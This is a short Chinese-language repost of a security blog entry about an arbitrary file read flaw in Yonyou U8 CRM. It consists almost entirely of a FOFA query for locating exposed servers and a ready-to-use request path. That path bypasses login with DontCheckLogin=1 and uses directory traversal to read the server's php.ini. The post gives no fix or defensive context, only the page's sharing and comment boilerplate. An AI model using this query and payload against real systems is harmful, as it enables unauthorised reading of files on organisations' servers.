用友 U8 CRM 任意文件读取漏洞 用友漏洞利用

admin 2024年8月19日22:03:51评论16 views字数 210阅读0分42秒阅读模式
前言‍‍‍‍‍‍‍‍
用友 U8 CRM  任意文件读取漏洞 用友漏洞利用
 

漏洞复现‍‍‍‍‍

fofa查询语句:

fofa:app="用友U8CRM"

利用脚本进行检测:‍‍‍‍‍

用友 U8 CRM  任意文件读取漏洞 用友漏洞利用

手工复现,访问路径即可:

/pub/downloadfile.php?DontCheckLogin=1&url=/datacache/../../../apache/php.ini

用友 U8 CRM  任意文件读取漏洞 用友漏洞利用

 

 

原文始发于微信公众号(Undoubted Security):【漏洞分享】用友 U8 CRM 任意文件读取漏洞 用友漏洞利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月19日22:03:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友 U8 CRM 任意文件读取漏洞 用友漏洞利用https://cn-sec.com/archives/3078075.html

发表评论

匿名网友 填写信息